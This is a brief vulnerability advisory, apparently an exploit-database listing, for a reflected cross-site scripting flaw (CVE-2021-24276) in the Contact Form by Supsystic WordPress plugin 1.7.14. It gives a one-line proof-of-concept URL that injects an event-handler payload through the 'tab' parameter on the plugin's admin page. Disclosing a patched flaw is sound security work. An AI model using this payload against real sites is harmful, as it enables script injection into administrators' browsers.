WordPress Contact Form plugin version 1.7.14 suffers from a cross site scripting vulnerability.
advisories | CVE-2021-24276
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-242761. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Related posts:
Chinese Hackers Target Taiwanese Financial Institutions with a new Stealthy Backdoor
Chromecast End-of-Life Announcement Highlights Urgent Need for Patch Management Reform Among Hybrid ...
Will the Crypto Crash Impact Cybersecurity in 2023? Maybe.
Trezor warns of massive crypto wallet phishing campaign
SHQ Response Platform and Risk Centre to Enable Management and Analysts Alike